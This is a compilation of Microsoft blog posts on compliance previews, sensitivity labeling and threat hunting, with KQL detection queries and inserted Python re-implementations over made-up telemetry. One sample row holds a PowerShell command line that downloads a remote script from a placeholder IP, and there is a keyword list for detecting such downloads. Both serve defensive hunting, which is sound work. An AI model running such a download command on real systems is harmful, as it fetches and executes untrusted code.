Microsoft Information Protection & Compliance Preview Programs

The following is provided from Microsoft Security and Compliance blogs at TechCommunity:

Welcome to the MIP and Compliance previews page!


Here you will find details of the various preview programs being managed by the MIP&C CXE team including the program status. This page won’t include upcoming preview programs so if you have any interest in working with us on new features as they are close to release make sure you register your interest:


We will be updating this page regularly with new webinars and resources so check back often!


Preview Programs

(Columns: Category / Program; Brief Description; More Details; Preview Status)

MIP: Trainable classifier auto-labeling with sensitivity labels
  Brief Description: Create sensitivity labels and corresponding automatic or recommended labeling policies in Office apps using built-in classifiers.

MIP: O365 service-based auto-labeling for EXO (data in transit) and SPO/OD (data at rest)
  Brief Description: Auto classification for Sensitivity Labels in OneDrive, SharePoint, and Exchange helps you automatically label or tag content as sensitive to ensure the configured protections are applied.

MIP: Using Sensitivity labels with Microsoft Teams, O365 Groups and SharePoint Online sites
  Brief Description: When you create sensitivity labels in the M365 compliance center, you can now apply them to the following containers: Microsoft Teams sites, Office 365 groups, and SharePoint sites. This gives you additional policy settings that can be applied to those containers.

MIP: Office client support for sensitivity labels with user-defined permissions
  Brief Description: Sensitivity labels that are configured to let users assign permissions will now appear in the Sensitivity picker in Office on Windows and Mac.
  Preview Status: (Office Insiders) & Rolling out to Monthly Channel

MIP: Office client support for automatic & recommended labeling
  Brief Description: Office apps on Windows and web support recommending or automatically applying a sensitivity label based on sensitive terms contained in the content. Word on Windows can also highlight and list the sensitive terms it detected in the canvas when a recommendation is shown.
  Preview Status: Office on Windows: (Office Insiders); Office Online: Public (opt-in)

MIP: Enable sensitivity labels for Office files in SharePoint and OneDrive
  Brief Description: Ability to apply sensitivity labels that include encryption to Office files stored in SharePoint and OneDrive; the SPO service processes the content of these files for coauthoring, eDiscovery, Data Loss Prevention, search, etc. This also enables sensitivity labeling in the Office Online apps (Word, Excel, PowerPoint Online).

MIP: Understand Data Classification
  Brief Description: After you apply your retention labels and sensitivity labels, you’ll want to see how the labels are being used across your tenant and what is being done with those items.


Thanks to those of you who have participated in our sessions so far. If you haven’t already, don’t forget to check out our resources available on the Tech Community.



@Adam Bell on behalf of the MIP and Compliance CXE team

The above was provided from Microsoft Security and Compliance blogs at TechCommunity

Microsoft Information Protection and Compliance Webinar Page

The following is provided from Microsoft Security and Compliance blogs at TechCommunity:

Welcome to the MIP and Compliance webinar page!


Here you will find details of our upcoming webinars as well as resources for past webinars. We will be updating this page regularly with new webinars and resources so check back often!


Upcoming Public Webinars:

(Columns: Category / Topic; Date & Time; Attendee Link)

Compliance: Compliance score how-to
  EMEA: Apr. 15, 2020 16:00 GMT
  NA: Apr. 15, 2020 12:00 PST

MIP: Exact Data Match (EDM) classification (What is EDM?)
  EMEA: Apr. 22, 2020 16:00 GMT
  NA: Apr. 22, 2020 12:00 PST


Recordings of Past Webinars:

(Columns: Date; Category: Topic)

Mar. 17, 2020
  MIP: Trainable classifiers

Mar. 10, 2020
  Compliance: Insider Risk Management & Communications Compliance

Mar. 5, 2020
  MIP: Using Sensitivity labels with Microsoft Teams, O365 Groups and SharePoint Online sites

Feb. 11, 2020
  MIP: Know Your Data

Jan. 22, 2020
  MIP: Introduction to SharePoint & OneDrive Auto-labeling

Jan. 15, 2020
  MIP: Moving to unified labeling


Thanks to those of you who participated in our sessions so far. If you haven’t already, don’t forget to check out our resources available on the Tech Community.



@Adam Bell on behalf of the MIP and Compliance CXE team

The above was provided from Microsoft Security and Compliance blogs at TechCommunity

Using Sensitivity labels with Microsoft Teams, O365 Groups and SharePoint Online sites

The following is provided from Microsoft Security and Compliance blogs at TechCommunity:

With the ability to label a SharePoint Online site, Teams site or O365 Group we’re introduced to the first capabilities of applying sensitivity labels to “containers”. Check out the webinar to understand how this works and how to use this in your organization.


This webinar was presented on Thu Mar 5th 2020, and the recording can be found here.


Attached to this post are:

  1. The FAQ document that summarizes the questions and answers that came up over the course of both Webinars; and
  2. A PDF copy of the presentation.

Thanks to those of you who participated during the two sessions and if you haven’t already, don’t forget to check out our resources available on the Tech Community.



@Adam Bell on behalf of the MIP and Compliance CXE team

The above was provided from Microsoft Security and Compliance blogs at TechCommunity

Announcing automatic labeling in Office Apps using built-in classifiers – Limited Preview

The following is provided from Microsoft Security and Compliance blogs at TechCommunity:

I’m thrilled to announce limited preview of automatic sensitivity labeling in Office apps using built-in classifiers. As part of this preview, the Microsoft 365 Compliance Center will allow you to create sensitivity labels and corresponding automatic or recommended labeling policies in Office apps using built-in classifiers.


The six built-in classifiers that are available as part of this preview are:

  • Resume: detects written accounts of an applicant’s personal, educational, and professional qualifications and experience
  • Source code: detects a set of instructions and statements written in the top 25 computer programming languages of GitHub
  • Offensive language: detects text items that contain profanities, slurs, taunts, and disguised expressions (expressions that have the same meaning as more offensive terms)
  • Threat: detects a specific category of offensive language related to threat to commit violence or do physical harm/damage to a person/property.
  • Harassment: detects a specific category of offensive language related to offensive conduct targeting one or multiple individuals regarding race, color, religion, national origin, gender, sexual orientation, age, disability and genetic information.
  • Profanity: detects a specific category of offensive language that contains swear words or vulgar language.

The Office apps which will support automatic sensitivity labeling using the above classifiers include the following:

  1. Win32 apps (You need to be a part of the Office Insider Program)
    1. Word
    2. Excel Win32
    3. PowerPoint Win32
  2. Office Online Apps (Opt-in to this preview required)
    1. Word Online 
    2. Excel Online 
    3. PowerPoint Online 
    4. Outlook Web 

The subscription and license requirements for this preview are the same as those needed to enable automatic sensitivity labels in Office apps. You need one of Microsoft 365 E5, Office 365 E5 or Azure Information Protection Premium P2. For more details, see subscription and licensing requirements for sensitivity labels.


Pre-requisites to start with built-in classifier-based auto-labeling

For the tenant in which you want to enable built-in classifier-backed sensitivity labeling in Office apps, you should have the following pre-requisites in place:

  1. Office online apps: To enable this in Office online apps, you will need to opt in to this preview.
  2. Win32 apps: To enable this in Office Win32 apps, you will need to opt in to the Office Insiders program. You have the option to opt in as an individual, a set of individuals, or a group to the Insider channel for testing.
  3. Once you have at least one of the above pre-requisites completed, you’ll need to define at least one label for your tenant and a corresponding label policy to detect an out-of-box or custom sensitive information type.
  4. Follow the procedure described in the section “How to Opt-in to this Preview” below to express interest in this feature.

How to Opt-in to this Preview

To express interest in this preview, please fill out this form with your details and we’ll enable it for your tenant within 3 working days.


Testing asks

Testing of built-in classifiers

  1. Built-in classifiers that are already published may be tested through the flow of creating an auto-apply sensitivity label policy. Please refer to the section “Creating auto-label policies” below for details on how to create a sensitivity label and a label policy.
  2. Feedback: We’d love to hear your feedback on how this feature is helping you with your use cases. We have put together a form that you can fill out for feedback.

Creating auto-label policies

Please follow these steps to create an auto-label policy that uses any of the built-in classifiers.


  1. Make sure that at least one sensitivity label and a corresponding label policy already exist in your tenant to detect an out-of-box or custom sensitive information type.
  2. Go to the Microsoft 365 compliance center, click Information Protection in the left navigation menu, and then click “Create a label”.
  3. Enter the name, tooltip, and description for the label and then click Next.
  4. Associate a built-in classifier with the label by adding a classifier.
  5. Choose which classifier to associate with the label. In this example we use “Resume”.
  6. Choose whether you want to auto-apply or just recommend this label, and provide an optional policy tip.

TIP: For the purpose of testing, use recommended labeling. Once you are satisfied with how the policies are working you can choose the auto-labeling option.

  7. You should then see your label in the list of labels. Click Label Policies to create one as the next step.
  8. Go to label policies and click Publish Labels.
  9. Choose the sensitivity label to be associated with the policy.
  10. While testing, scope the policy to certain users or user groups.

TIP: For the purpose of testing, restrict the scope to a limited set of users; it can be expanded later.

  11. Choose your policy settings and give a name and description to your label policy.
  12. You should now see your label policy in the list of label policies.
  13. Depending on the label settings, you will now see file detections as files are matched by the trainable classifiers, with a policy tip appearing in the app. Please note that it takes up to 24 hours for the policy to be synced across all the apps after policy creation.




Helpful Feedback

Throughout the process of testing built-in classifiers and label application across Office apps, your feedback on the following would be helpful:

  • Usability feedback
    • Feedback on the experience all-up
  • Feedback on using these classifiers in the auto-apply or recommended label policy
    • Are labels being applied/recommended to documents that match the category of the classifier (resume, source code, etc.)?
    • Is label recommendation/auto-application accurate and quick?

We have published a form that you can fill to send us your valuable feedback.


For more information on Microsoft security solutions visit our website at or visit our security blog


The above was provided from Microsoft Security and Compliance blogs at TechCommunity

Threat hunting simplified with Microsoft Threat Protection

The following is provided from Microsoft Security and Compliance blogs at TechCommunity:


While well-funded and highly organized security operations teams often have the most sophisticated detection mechanisms in place, these teams still need experts that can run guided investigations to locate and stop certain threats. For example, sophisticated attackers often live off the land, taking advantage of normal system functionality that leaves almost no identifiable traces. While behavior-based detection algorithms powered by machine learning and AI can learn and respond quickly, human experts remain extremely valuable, especially if they know the network and are familiar with how attacks might play out.


What is threat hunting?

Cyberthreat hunting or simply threat hunting is a proactive cybersecurity activity that aims to find threats that are either buried under massive quantities of security signals and alert data or are simply not flagged by security products. It is generally a manual process, although great tools that we will describe in this article can make the process much less tedious and time-consuming.


During threat hunting, SecOps practitioners apply threat intelligence takeaways, whether from their own internal research or external research, and devise ingenious ways to determine the existence of an otherwise undetected threat. To do that, they need efficient access to comprehensive data about events and entities in their network as well as a good, quantifiable understanding of normal states or baselines.


Threat hunting lets analysts work with established baselines and highlight behavior that might be interesting. With the right tools, analysts can tailor their threat hunting activities to their environments and the threats that they will likely encounter. For instance, they can hunt for unusual behavior—like unexpected network connections—that might indicate that an in-house app or an account has been compromised.


The process of establishing the baselines themselves can also be part of threat hunting. To be able to do this, analysts need tools that can look backwards and forwards in time quickly, providing data that is sufficiently granular for defining normal states.


Effective threat hunting relies on:


  • Comprehensive, well-structured, and retrievable event and system data
  • Threat intelligence: knowledge about threat actors or actor infrastructure, methodologies, and indicators
  • Granular baseline information that represents normal activity and states


Threat hunting example


Let’s look at what Jessica, our fictional but awesome SecOps person, might go through:


  1. Jessica, who works for Contoso Health Services, finds out about a new vulnerability that affects one of the product suites in her environment. In this case, the attacks are against a known web content management system (CMS).
  2. After doing some more research online, she determines that, because the release of this vulnerability is so recent, it is unclear how attackers might be able to leverage it in her environment. She also knows that a patch to remedy the issue is not yet available.
  3. She creates a query for behaviors tied to the processes involved in this vulnerability to determine existing baseline and normal behavior. She then modifies queries to return only what would not be expected.
  4. Jessica also creates rules so that the queries run regularly and send her notifications whenever there are matches.
  5. Because Jessica did her research and constructed her queries very well—carefully considering the possibility that some unaffected machines might exhibit threat-like behavior—each match to her query constitutes a viable threat-hunting find. These matches include unusual process activity that might very well be actual attempts to abuse the vulnerable CMS.

Clearly, Jessica’s finds can benefit Contoso Health Services by proactively locating exploitation attempts against an unpatched vulnerability. Likewise, her ability to efficiently design and deploy proactive defenses highlights her own capabilities as a defender.


Data is key

With cloud-based storage and compute solutions, we can now easily collect massive quantities of data. But as we store larger data sets, there is a growing need to be able to efficiently manipulate and make sense of them.


Microsoft Threat Protection itself is made possible by the power of the Azure cloud coupled with insights from the Intelligent Security Graph. In the background, massive amounts of threat intelligence and security data from across Microsoft’s portfolio are crunched and matched against indicators, expert human rules, and machine learning (ML) algorithms in Microsoft AI. This process generates meaningful alerts, identifying threat components and activities that automated investigation and response (AIR) capabilities remediate.


For example, Microsoft Threat Protection distinguishes between malicious and normal attempts to write to the registry by looking at millions of examples of registry writes and their contexts: the files or processes involved, file pedigrees, whatever was written to the registry, the time the writes were performed, and so on. With this much baseline info, the AI can confidently raise alerts and start performing remediation activities, rapidly placing harmful registry modifications and associated files in quarantine.


While AI and other automated systems are particularly effective at finding threats, human intuition and flexibility can still beat them when dealing with highly specialized or unusual scenarios. What human analysts need, however, are tools that let them:


  • Effectively access and handle large sets of data — while the interface is easy-to-use, the tool also needs to be responsive and must label and organize data well. At the same time, log storage must be as straightforward as any competitive cloud-based storage and compute solution that can be deployed and scaled without professional system integrators and other specialists.
  • Automate monitoring of interesting matches to new data — going back to Jessica’s fictional investigation, the tools should let her monitor new activities for matches to the attack activities she has modeled. Without this automation, Jessica will be tied to her chair, constantly looking for matches as new data comes in.


Cross-product advanced hunting with Microsoft Threat Protection

With advanced hunting in Microsoft Threat Protection—available in the Microsoft 365 security center with a valid license (go here to get started)—you can deep dive and hunt across data from various workspaces in your Microsoft 365 environment. Advanced hunting initially covers both your endpoints and your Office 365 email. By the end of March 2020, we will expand the schema to cover identity- and app-related signals from Azure ATP and Microsoft Cloud App Security.


You can work with Kusto queries, plus you have the convenience of switching to richer views made possible by the various integrated solutions. For example, you can drill down from a query to dedicated pages with comprehensive contextual information about specific alerts, devices, users, domains, IP addresses, and even software vulnerabilities.


The specialized data set is organized in a manageable schema covering security-sensitive event and entity information, such as device info, network configuration info, process events, registry events, logon events, file events, and email events.


Microsoft will continually incorporate more information into this schema. Here are a few examples of the sophisticated threat hunting activities you can perform with the current coverage.


Identify vulnerable devices

With advanced hunting, you can access software inventory information from Threat & Vulnerability Management. Imagine being able to write queries that check for possible exploitation behavior on devices running vulnerable software.


The following sample query locates machines affected by the RDP vulnerability CVE-2019-0708—popularly known as “BlueKeep”—and checks for actual RDP connections initiated by unexpected executables:


// Devices that Threat & Vulnerability Management reports as affected by CVE-2019-0708
let BlueKeepVulnerableMachines = DeviceTvmSoftwareInventoryVulnerabilities
| where CveId == "CVE-2019-0708"
| distinct DeviceId;
// Find unusual processes on Windows 7 or Windows Server 2008 machines with
// outbound connections to TCP port 3389
let listMachines = DeviceInfo
| where OSVersion == "6.1" // Win7 and Srv2008
| distinct DeviceId;
// Network connection events are the source table for the rest of the query
DeviceNetworkEvents
| where DeviceId in(BlueKeepVulnerableMachines)
| where RemotePort == 3389
| where Protocol == "Tcp" and ActionType == "ConnectionSuccess"
| where InitiatingProcessFileName !in~ // Removing expected programs
("mstsc.exe","RTSApp.exe", "RTS2App.exe","RDCMan.exe","ws_TunnelService.exe",
"spiceworks-finder.exe","FSDiscovery.exe","FSAssessment.exe", "chrome.exe",
"microsodeedgecp.exe", "LTSVC.exe", "Hyper-RemoteDesktop.exe", "", "RetinaEngine.exe",
"AuvikService.exe", "AuvikAgentService.exe", "CollectGuestLogs.exe",
"NetworkWatcherAgent.exe", "MobaRTE.exe", "java.exe", "mscorsvw.exe", "MultiDesk.exe",
"Microsoft Remote Desktop", "javaw.exe", "ASGRD.exe", "MultiDesk64.exe", "Passwordstate.exe")
// Keep only devices on the affected OS build
| join listMachines on DeviceId
| project Timestamp, DeviceId, DeviceName, RemoteIP, InitiatingProcessFileName,
InitiatingProcessFolderPath, InitiatingProcessSHA1
// One row per device, initiating process and day
| summarize conn=count() by DeviceId, InitiatingProcessFileName, bin(Timestamp, 1d)
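To make the baseline-then-hunt idea from Jessica’s walkthrough and the BlueKeep query above concrete, here is the same logic rendered in Python over constructed telemetry. This is an added example, not code from the original post or from Microsoft: the schema table names are used only as labels for the sample rows, the device ids, IP addresses and process names are made up, and the list of expected RDP programs is learned from a baseline window instead of being typed in, which goes beyond the query (the query hard-codes its allowlist). The result is the query’s final summarize: unexpected RDP connections per device, process and day.

```python
"""Baseline-then-hunt over constructed endpoint telemetry (added example, not from the post).

Steps, mirroring the advanced hunting query:
  1. restrict to devices that are both vulnerable to the CVE and on the affected OS build,
  2. keep successful outbound TCP connections to 3389,
  3. drop processes that are expected to open RDP sessions (learned from a baseline window),
  4. count what remains per device, process and day.
All rows are constructed sample data, not real telemetry.
"""
from collections import Counter
from datetime import datetime

# Constructed rows shaped like DeviceTvmSoftwareInventoryVulnerabilities
VULNS = [
    {"DeviceId": "dev-a", "CveId": "CVE-2019-0708"},
    {"DeviceId": "dev-b", "CveId": "CVE-2019-0708"},
    {"DeviceId": "dev-c", "CveId": "CVE-2019-0708"},   # vulnerable but not on build 6.1
    {"DeviceId": "dev-d", "CveId": "CVE-2017-0144"},   # a different CVE, out of scope
]

# Constructed rows shaped like DeviceInfo
DEVICES = [
    {"DeviceId": "dev-a", "DeviceName": "ws-01",  "OSVersion": "6.1"},
    {"DeviceId": "dev-b", "DeviceName": "srv-01", "OSVersion": "6.1"},
    {"DeviceId": "dev-c", "DeviceName": "ws-02",  "OSVersion": "10.0"},
    {"DeviceId": "dev-d", "DeviceName": "ws-03",  "OSVersion": "6.1"},
]

def _ev(ts, dev, proc, ip, port=3389, proto="Tcp", action="ConnectionSuccess"):
    """Build one constructed row shaped like DeviceNetworkEvents."""
    return {"Timestamp": datetime.fromisoformat(ts), "DeviceId": dev,
            "InitiatingProcessFileName": proc, "RemoteIP": ip,
            "RemotePort": port, "Protocol": proto, "ActionType": action}

# Baseline window: what RDP activity normally looks like on these devices
BASELINE = [
    _ev("2020-03-01T09:00:00", "dev-a", "mstsc.exe", "10.0.0.5"),
    _ev("2020-03-02T09:05:00", "dev-b", "RDCMan.exe", "10.0.0.6"),
    _ev("2020-03-03T10:00:00", "dev-a", "MSTSC.EXE", "10.0.0.7"),   # case differs, same program
]
# Hunt window: the events to test against the learned baseline
HUNT = [
    _ev("2020-03-10T08:00:00", "dev-a", "mstsc.exe", "10.0.0.5"),          # expected program
    _ev("2020-03-10T08:10:00", "dev-a", "svchost.exe", "203.0.113.9"),     # unexpected
    _ev("2020-03-10T08:20:00", "dev-a", "svchost.exe", "203.0.113.10"),    # unexpected, same day
    _ev("2020-03-11T08:20:00", "dev-a", "svchost.exe", "203.0.113.11"),    # unexpected, next day
    _ev("2020-03-10T09:00:00", "dev-b", "powershell.exe", "203.0.113.9", action="ConnectionFailed"),
    _ev("2020-03-10T09:30:00", "dev-c", "cmd.exe", "203.0.113.9"),         # device not on build 6.1
    _ev("2020-03-10T09:40:00", "dev-d", "cmd.exe", "203.0.113.9"),         # device not vulnerable
    _ev("2020-03-10T09:50:00", "dev-b", "cmd.exe", "203.0.113.9", port=443),  # not RDP
]

def in_scope_devices(vulns, devices, cve="CVE-2019-0708", os_version="6.1"):
    """Intersection of the query's two 'let' sets: vulnerable to the CVE and on the OS build."""
    vulnerable = {v["DeviceId"] for v in vulns if v["CveId"] == cve}
    on_build = {d["DeviceId"] for d in devices if d["OSVersion"] == os_version}
    return vulnerable & on_build

def rdp_connections(events, scope):
    """Successful outbound TCP connections to 3389 from in-scope devices."""
    return [e for e in events
            if e["DeviceId"] in scope and e["RemotePort"] == 3389
            and e["Protocol"] == "Tcp" and e["ActionType"] == "ConnectionSuccess"]

def learn_allowlist(baseline_events, scope):
    """Programs that opened RDP sessions during the baseline are treated as expected.
    Names are lower-cased to reproduce the case-insensitive behaviour of KQL's !in~."""
    return {e["InitiatingProcessFileName"].lower() for e in rdp_connections(baseline_events, scope)}

def hunt_unexpected_rdp(hunt_events, scope, allowlist):
    """Equivalent of the query's summarize: unexpected connections per (DeviceId, process, day)."""
    counts = Counter()
    for e in rdp_connections(hunt_events, scope):
        if e["InitiatingProcessFileName"].lower() in allowlist:
            continue
        day = e["Timestamp"].date().isoformat()   # bin(Timestamp, 1d)
        counts[(e["DeviceId"], e["InitiatingProcessFileName"], day)] += 1
    return dict(counts)

def run():
    """Whole pipeline on the constructed data; returns the summarized findings."""
    scope = in_scope_devices(VULNS, DEVICES)
    return hunt_unexpected_rdp(HUNT, scope, learn_allowlist(BASELINE, scope))

if __name__ == "__main__":
    for (dev, proc, day), n in sorted(run().items()):
        print(f"{day} {dev} {proc}: {n} unexpected RDP connection(s)")
```

Only `dev-a`’s `svchost.exe` connections survive: the failed connection, the wrong port, and the two devices outside the vulnerable-and-6.1 intersection are all filtered before the allowlist is consulted, which is the order the KQL applies them in too.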


Hunt for threats that land by email and impact devices

You can also run queries that track threats that might have arrived through email and then traversed your endpoints. For example, this simple query checks for files from a known malicious email sender:


// Get prevalence of files sent by a malicious sender in your organization
EmailAttachmentInfo
| where SenderFromAddress =~ "" // the sender address to hunt for
| where isnotempty(SHA256)
| join (
DeviceFileEvents
| project FileName, SHA256
) on SHA256
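The same email-to-endpoint pivot in Python, as an added example that is not part of the original post or Microsoft’s code. The sample rows are constructed; the schema table names only label which side of the join each list stands for. It keeps the query’s two filters (a case-insensitive sender match like `=~`, and dropping rows with an empty hash like `isnotempty(SHA256)`) and goes one step further than the inner join by also reporting hashes that never showed up on any device.

```python
"""Pivot from email attachments to device file events by SHA256 (added example, not from the post)."""
from collections import defaultdict

# Constructed rows shaped like EmailAttachmentInfo
EMAIL_ATTACHMENTS = [
    {"SenderFromAddress": "billing@example.net", "FileName": "invoice.doc", "SHA256": "aaa111"},
    {"SenderFromAddress": "Billing@Example.net", "FileName": "invoice.doc", "SHA256": "aaa111"},
    {"SenderFromAddress": "billing@example.net", "FileName": "notes.txt",   "SHA256": ""},       # no hash recorded
    {"SenderFromAddress": "billing@example.net", "FileName": "update.exe",  "SHA256": "bbb222"},
    {"SenderFromAddress": "hr@example.net",      "FileName": "policy.pdf",  "SHA256": "ccc333"},  # different sender
]

# Constructed rows shaped like DeviceFileEvents
DEVICE_FILE_EVENTS = [
    {"DeviceName": "ws-01", "FileName": "invoice.doc",     "SHA256": "aaa111"},
    {"DeviceName": "ws-02", "FileName": "invoice.doc",     "SHA256": "aaa111"},
    {"DeviceName": "ws-02", "FileName": "invoice (1).doc", "SHA256": "aaa111"},  # renamed, same content
    {"DeviceName": "ws-03", "FileName": "policy.pdf",      "SHA256": "ccc333"},
]

def hashes_from_sender(attachments, sender):
    """SHA256 values attached to mail from `sender`, matched case-insensitively; empty hashes skipped."""
    wanted = sender.lower()
    return {a["SHA256"] for a in attachments
            if a["SenderFromAddress"].lower() == wanted and a["SHA256"]}

def file_prevalence(attachments, file_events, sender):
    """Map each hash sent by `sender` to the set of devices where that hash was observed.

    Hashes with an empty set were never seen on an endpoint in this data; the KQL inner
    join would silently drop them, but for an analyst 'sent, never observed on a device'
    is useful information in its own right.
    """
    wanted = hashes_from_sender(attachments, sender)
    seen = defaultdict(set)
    for ev in file_events:
        if ev["SHA256"] in wanted:           # join ... on SHA256
            seen[ev["SHA256"]].add(ev["DeviceName"])
    return {h: seen.get(h, set()) for h in wanted}

if __name__ == "__main__":
    for sha, devices in sorted(file_prevalence(EMAIL_ATTACHMENTS, DEVICE_FILE_EVENTS,
                                                "billing@example.net").items()):
        print(f"{sha}: seen on {len(devices)} device(s) {sorted(devices)}")
```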

Read more about hunting on devices and email


Start simple, learn fast

There’s no need to get intimidated by the query interface as the Kusto Query Language is straightforward. It has very powerful data manipulation capabilities that can be learned with more experience, but it takes only a few minutes to begin running simple queries, like locating a file SHA mentioned in the Twitter feed of your favorite security researcher.


Once you are there, you can easily look deeper into an instance of the SHA on a specific device or grab a list of all the devices with that SHA and look for commonalities between those devices. Again, it does not hurt that you have other Microsoft Threat Protection features, such as file and machine profile pages, at your disposal.


Advanced hunting is backed by a strong community of experienced security practitioners and Kusto Query Language users who are ready to share expertise so that you can easily learn a new syntax. You will find many blog posts in the Microsoft Defender ATP Tech Community discussing various query techniques. You could also explore the Microsoft Threat Protection repository or the Microsoft Defender ATP repository for queries covering various known threat campaigns and techniques.

Soon enough, you’ll be creating custom detection rules—available by the end of March 2020 with Microsoft Threat Protection—from your hunting queries. These detection rules automatically check for and respond to various events and system states, including suspected breach activity and misconfigured machines.


Try it yourself

It’s time to try advanced hunting for yourself! If you believe PowerShell download activity in your network is likely suspicious, give the query below a try.


// Finds PowerShell execution events that could involve a download
union DeviceProcessEvents, DeviceNetworkEvents
| where Timestamp > ago(7d)
// Pivoting on PowerShell processes
| where FileName in~ ("powershell.exe", "powershell_ise.exe")
// Suspicious commands; extend the list with other download-related tokens seen in your environment
| where ProcessCommandLine has_any("WebClient")
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine,
FileName, ProcessCommandLine, RemoteIP, RemoteUrl, RemotePort, RemoteIPType
| top 100 by Timestamp
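For readers who want to see what that query is doing step by step, here is an added Python example (not from the original post or from Microsoft) that runs the same hunt over constructed process and network events. It reproduces the case-insensitive `in~` and `has_any` matching, orders findings newest first like `top 100 by Timestamp`, and additionally ties each suspicious PowerShell process to the network connections it made, so the remote host appears next to the command line. `DOWNLOAD_TOKENS` is a hypothetical list seeded with the one token the post shows; the device names, process ids and addresses are made up.

```python
"""Hunt PowerShell download activity over constructed telemetry (added example, not from the post)."""

# Hypothetical token list: "WebClient" is from the post, the rest are assumptions to tune per environment
DOWNLOAD_TOKENS = ("WebClient", "DownloadString", "Invoke-WebRequest")
POWERSHELL_NAMES = ("powershell.exe", "powershell_ise.exe")

# Constructed rows shaped like DeviceProcessEvents
PROCESS_EVENTS = [
    {"Timestamp": "2020-03-10T08:00:00", "DeviceName": "ws-01", "ProcessId": 4100,
     "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -nop -c \"(New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')\""},
    {"Timestamp": "2020-03-10T08:01:00", "DeviceName": "ws-01", "ProcessId": 4200,
     "FileName": "POWERSHELL.EXE",                    # case differs; in~ still matches
     "ProcessCommandLine": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"Timestamp": "2020-03-10T08:02:00", "DeviceName": "ws-02", "ProcessId": 5100,
     "FileName": "powershell_ise.exe",
     "ProcessCommandLine": "powershell_ise.exe invoke-webrequest https://203.0.113.10/x"},
    {"Timestamp": "2020-03-10T08:03:00", "DeviceName": "ws-02", "ProcessId": 5200,
     "FileName": "cmd.exe",                            # not PowerShell, never considered
     "ProcessCommandLine": "cmd.exe /c curl http://203.0.113.11"},
]

# Constructed rows shaped like DeviceNetworkEvents, linked to processes by InitiatingProcessId
NETWORK_EVENTS = [
    {"DeviceName": "ws-01", "InitiatingProcessId": 4100, "RemoteIP": "203.0.113.9",  "RemotePort": 80},
    {"DeviceName": "ws-02", "InitiatingProcessId": 5100, "RemoteIP": "203.0.113.10", "RemotePort": 443},
    {"DeviceName": "ws-02", "InitiatingProcessId": 5200, "RemoteIP": "203.0.113.11", "RemotePort": 80},
]

def has_any(text, tokens):
    """Case-insensitive 'contains any of these tokens', the behaviour of KQL has_any on strings."""
    lowered = text.lower()
    return any(t.lower() in lowered for t in tokens)

def hunt_powershell_downloads(process_events, network_events, tokens=DOWNLOAD_TOKENS):
    """One finding per PowerShell process whose command line carries a download token,
    each carrying the remote endpoints that process connected to. Newest first."""
    # Index network events by (device, pid) so a finding can show where the process connected
    by_proc = {}
    for n in network_events:
        key = (n["DeviceName"], n["InitiatingProcessId"])
        by_proc.setdefault(key, []).append(f'{n["RemoteIP"]}:{n["RemotePort"]}')

    findings = []
    for p in process_events:
        if p["FileName"].lower() not in POWERSHELL_NAMES:   # FileName in~ (...)
            continue
        if not has_any(p["ProcessCommandLine"], tokens):    # ProcessCommandLine has_any(...)
            continue
        findings.append({
            "Timestamp": p["Timestamp"],
            "DeviceName": p["DeviceName"],
            "ProcessCommandLine": p["ProcessCommandLine"],
            "Remotes": by_proc.get((p["DeviceName"], p["ProcessId"]), []),
        })
    # ISO-8601 timestamps sort lexically, so this is 'top N by Timestamp'
    return sorted(findings, key=lambda f: f["Timestamp"], reverse=True)

if __name__ == "__main__":
    for f in hunt_powershell_downloads(PROCESS_EVENTS, NETWORK_EVENTS):
        print(f"{f['Timestamp']} {f['DeviceName']} -> {f['Remotes']}\n    {f['ProcessCommandLine']}")
```

The join on `(DeviceName, ProcessId)` is what the KQL `union` leaves to the analyst: the network rows carry `InitiatingProcessFileName` rather than `FileName`, so on their own they do not pass the PowerShell filter, and correlating them back to the process row is how the remote address ends up in the finding.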


Want to explore this query further and understand how it might catch malicious activity? Learn how this query works


Hunt across your entire environment with Azure Sentinel

The advanced hunting capabilities in Microsoft Threat Protection enable you to find threats across your users, endpoints, email and productivity tools, and apps. You can integrate the data from Microsoft Threat Protection into Azure Sentinel and then expand that dataset to include data from Azure Security Center and third-party security products to find threats that span your entire environment.


Azure Sentinel provides cloud-native SIEM capabilities, including AI that fuses multiple alerts to a complete attack chain. For example, it can take an alert from Microsoft Threat Protection and combine that with an alert from a third-party firewall. You can then visualize that attack chain or use Kusto Query Language to query across the full set of security data and then remediate the issue and put in place an automated solution with Azure Logic Apps.


Louie Mayor & Justin Carroll

Microsoft Threat Protection team

The above was provided from Microsoft Security and Compliance blogs at TechCommunity

Microsoft Partners with Terranova Security for Security Awareness Training

The following is provided from Microsoft Security and Compliance blogs at TechCommunity:

Microsoft is pleased to announce a strategic partnership with Terranova Security to provide world-class security training to end users. Through this partnership, we will address our customers’ most significant risk vectors – phishing driving risky end user behaviors. After a multi-month search across the industry, we chose to team up with Terranova Security because we believe that our partnership will enable us to deliver unique and highly differentiated value to our customers.


Users falling prey to phishing is one of the most common, impactful risks facing our customers today. Microsoft’s partnership with Terranova Security enables us to deliver an industry-leading solution with differentiated phishing simulation and human-centric training.

Rob Lefferts, Corporate Vice President, Microsoft 365 Security


Microsoft’s technology and platform enriches us with intelligent insights to develop security awareness training on the most recent and relevant risks. This partnership empowers Terranova Security to provide human-centric security training at maximum scale and efficacy.  

Lise Lapointe, CEO, Terranova Security


We chose Terranova Security for their human-centric approach, which draws on principles of behavioral science to create training content that demonstrably changes user behavior; their comprehensive content catalog, which will allow customers to customize training based on context and behavior patterns; and their demonstrated commitment to diverse and inclusive practices.

Started in 2001, Terranova Security brings together technology and education, twin passions of the founder, to create a unique interdisciplinary approach to security awareness training. The emergent need for user training that sparked the journey has since evolved. Today, the market looks to Terranova Security’s leadership and CEO Lise Lapointe’s book is the go-to text for designing effective security awareness programs.  The pedagogical consistency of Terranova Security’s content will empower our customers to deliver effective, engaging phish training to all their users as well as measure its efficacy.


